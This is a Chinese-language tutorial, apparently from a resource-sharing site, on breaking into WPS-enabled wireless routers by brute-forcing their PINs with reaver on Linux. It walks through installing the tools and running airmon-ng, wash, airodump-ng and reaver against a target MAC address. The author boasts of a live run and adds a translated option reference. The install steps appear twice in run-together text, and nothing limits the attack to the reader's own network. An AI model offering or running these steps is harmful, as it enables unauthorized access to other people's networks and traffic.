在linux下使用reaver破解无线wifi密码的步骤
需要工具:reaver 原理:穷举PIN码以攻破无线路由器的安全防护安装:下载源码从这个网址下载reaver源代码http://code.google.com/p/reaver-wpswget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz解压tar-xzvf reaver-1.4.tar.gz安装必要的软件依赖库和工具在您编译reaver前需要先安装pcaplib等工具,后面还需要aircrack-ngsudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev编译和安装配置和编译Reavercd reaver-1.4cd src./configuremake下载aircrack-ng源代码并编译从Ubuntu12.04版本开始aircrack-ng不再被包含在版本软件仓库中,不过我们可以从网上下载它的源代码进行编译安装。如果aircrack-ng已经存在,则不必安装。./configuremakesudo install解压 tar -xzvf reaver-1.4.tar.gz安装必要的软件依赖库和工具在您编译 reaver前需要先安装 pcaplib等工具,后面还需要 aircrack-ng sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev编译和安装配置和编译 Reaver cd reaver-1.4 cd src ./configure make安装 Reaver sudo make install方法:1 输入:airmon-ng start wlan0 开启监听模式 (屏幕显示 加载8187L驱动成功–一次就加载成功啊!)2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间无反应按Ctrl+C,结束进程,这时记下你要PJ的目标路由MAC.3 输入:airodump-ng mon0 网卡以混杂模式扫描所有频道—并显示所有AP的信息(包括 AP的信号强度,ESSID,MAC,频道,加密方式,等等…..),按Ctrl+C,结束扫描.注:如果你已知对方无线路由信息 第2,第3步 可省略!4 输入:reaver -i mon0 -b MAC -a -S -vv 开始穷举pin码注:随时可以按CTRL+C退出保存进程,下次按下光标控制键“上”键然后回车,进程可继续。实战我输入了reaver -i mon0 -b MACD8:5D:4C:37:78:F6 -a -S -vv -d 0 ( 多加了 -d 0 加快速度 ),只见屏幕飞闪……爽啊!reaver 参数详解必须参数-i, –interface=<wlan> Name of the monitor-mode interface to use网卡的监视接口,通常是mon0-b, –bssid=<mac> BSSID of the target APAP的MAC地址Optional Arguments: 可选参数-m, –mac=<mac> MAC of the host system指定本机MAC地址-e, –essid=<ssid> ESSID of the target AP路由器的ESSID,一般不用指定-c, –channel=<channel> Set the 802.11 channel for the interface (implies -f)信号的频道,如果不指定会自动扫描-o, –out-file=<file> Send output to a log file [stdout]输出日志文件-s, –session=<file> Restore a previous session file恢复进度文件-C, –exec=<command> Execute the supplied command upon successful pin recoverypin成功后执行命令-D, –daemonize Daemonize reaver设置reaver成Daemon-a, –auto Auto detect the best advanced options for the target AP对目标AP自动检测高级参数-f, –fixed Disable channel hopping禁止频道跳转-5, –5ghz Use 5GHz 802.11 channels使用5G频道-v, –verbose Display non-critical warnings (-vv for more)显示不重要警告信息 -vv 可以显示更多-q, –quiet Only display critical messages只显示关键信息-h, –help Show help显示帮助Advanced Options:高级选项-p, –pin=<wps pin> Use the specified 4 or 8 digit WPS pin使用指定的4位或者8位pin码-d, –delay=<seconds> Set the delay between pin attempts [1]pin间延时,默认1秒-l, –lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]AP锁定WPS后等待时间-g, –max-attempts=<num> Quit after num pin attempts最大pin次数Reaver 参数—天天-x, –fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]10次意外失败后等待时间,默认0秒-r, –recurring-delay=<x:y> Sleep for y seconds every x pin attempts每x次pin后等待y秒-t, –timeout=<seconds> Set the receive timeout period [5]收包超时,默认5秒-T, –m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]M5/M7超时,默认0.2秒-A, –no-associate Do not associate with the AP (association must be done by another application)不连入AP(连入过程必须有其他程序完成)-N, –no-nacks Do not send NACK messages when out of order packets are received不发送NACK信息(如果一直pin不动,可以尝试这个参数)-S, –dh-small Use small DH keys to improve crack speed使用小DH关键值提高速度(推荐使用)-L, –ignore-locks Ignore locked state reported by the target AP忽略目标AP报告的锁定状态-E, –eap-terminate Terminate each WPS session with an EAP FAIL packet每当收到EAP失败包就终止WPS进程-n, –nack Target AP always sends a NACK [Auto]对目标AP总是发送NACK,默认自动-w, –win7 Mimic a Windows 7 registrar [False]模拟win7注册,默认关闭Ps:影响到无线的因素很多,所以各参数之间的配合很重要,当然,最关键的还是取决于信号。原理详细:什么是PIN码?印在无线路由器设备标签上的一组8位数字字符串,无线路由器管理界面中当然也会存在并可更改。PIN码有什么用?在无线网卡的配套管理软件(如TP-LINK的QSS软件)里输入无线路由器设备上的那8位数字字符串就可以成功登录该已被加密的无线路由器。穷举PIN码是什么意思?既然知道了无线路由器PIN值的范围(8位纯数字),且目前大部分设备的WPS是呈开启状态的,那么穷举PIN码以攻破无线路由器的安全防护这一暴力行为就有了*理论*可行性
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 在linux下使用reaver破解无线wifi密码的步骤
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html